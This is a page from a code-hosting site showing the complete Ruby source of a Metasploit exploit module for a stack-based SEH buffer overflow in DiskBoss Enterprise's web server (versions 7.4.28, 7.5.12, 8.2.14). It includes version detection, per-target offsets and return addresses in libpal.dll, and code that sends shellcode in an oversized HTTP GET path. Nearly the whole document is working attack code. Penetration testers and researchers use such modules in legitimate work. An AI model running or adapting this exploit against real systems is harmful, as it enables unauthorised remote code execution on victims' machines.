Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
32286 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Seh

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'DiskBoss Enterprise GET Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack-based buffer overflow vulnerability

19
          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,

20
          caused by improper bounds checking of the request path in HTTP GET

21
          requests sent to the built-in web server. This module has been

22
          tested successfully on Windows XP SP3 and Windows 7 SP1.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'vportal', # Vulnerability discovery and PoC

27
          'Ahmad Mahfouz',  # Vulnerability discovery and PoC

28
          'Gabor Seljan',   # Metasploit module

29
          'Jacob Robles'    # Metasploit module

30
        ],

31
        'References' => [

32
          ['CVE', '2025-34105'],

33
          ['EDB', '40869'],

34
          ['EDB', '42395']

35
        ],

36
        'DefaultOptions' => {

37
          'EXITFUNC' => 'thread'

38
        },

39
        'Platform' => 'win',

40
        'Payload' => {

41
          'BadChars' => "\x00\x09\x0a\x0d\x20",

42
          'Space' => 2000

43
        },

44
        'Targets' => [

45
          [

46
            'Automatic Targeting',

47
            {

48
              'auto' => true

49
            }

50
          ],

51
          [

52
            'DiskBoss Enterprise v7.4.28',

53
            {

54
              'Offset' => 2471,

55
              'Ret' => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]

56
            }

57
          ],

58
          [

59
            'DiskBoss Enterprise v7.5.12',

60
            {

61
              'Offset' => 2471,

62
              'Ret' => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]

63
            }

64
          ],

65
          [

66
            'DiskBoss Enterprise v8.2.14',

67
            {

68
              'Offset' => 2496,

69
              'Ret' => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]

70
            }

71
          ]

72
        ],

73
        'Privileged' => true,

74
        'DisclosureDate' => '2016-12-05',

75
        'DefaultTarget' => 0,

76
        'Notes' => {

77
          'Reliability' => UNKNOWN_RELIABILITY,

78
          'Stability' => UNKNOWN_STABILITY,

79
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

80
        }

81
      )

82
    )

83
  end

84


85
  def check

86
    res = send_request_cgi(

87
      'method' => 'GET',

88
      'uri' => '/'

89
    )

90


91
    if res && res.code == 200

92
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/

93
        return Exploit::CheckCode::Vulnerable

94
      elsif res.body =~ /DiskBoss Enterprise/

95
        return Exploit::CheckCode::Detected

96
      end

97
    else

98
      vprint_error('Unable to determine due to a HTTP connection timeout')

99
      return Exploit::CheckCode::Unknown

100
    end

101


102
    Exploit::CheckCode::Safe

103
  end

104


105
  def exploit

106
    mytarget = target

107


108
    if target['auto']

109
      mytarget = nil

110


111
      print_status('Automatically detecting the target...')

112


113
      res = send_request_cgi(

114
        'method' => 'GET',

115
        'uri' => '/'

116
      )

117


118
      if res && res.code == 200

119
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/

120
          mytarget = targets[1]

121
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/

122
          mytarget = targets[2]

123
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/

124
          mytarget = targets[3]

125
        end

126
      end

127


128
      if !mytarget

129
        fail_with(Failure::NoTarget, 'No matching target')

130
      end

131


132
      print_status("Selected Target: #{mytarget.name}")

133
    end

134


135
    case mytarget

136
    when targets[1], targets[2]

137
      sploit = make_nops(21)

138
      sploit << payload.encoded

139
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

140
      sploit << [mytarget.ret].pack('V')

141
      sploit << rand_text_alpha(2500)

142
    when targets[3]

143
      seh = generate_seh_record(mytarget.ret)

144
      sploit = payload.encoded

145
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

146
      sploit[sploit.length, seh.length] = seh

147
      sploit << make_nops(10)

148
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode

149
      sploit << rand_text_alpha(5000 - sploit.length)

150
    else

151
      fail_with(Failure::NoTarget, 'No matching target')

152
    end

153


154
    send_request_cgi(

155
      'method' => 'GET',

156
      'uri' => sploit

157
    )

158
  end

159
end

160


161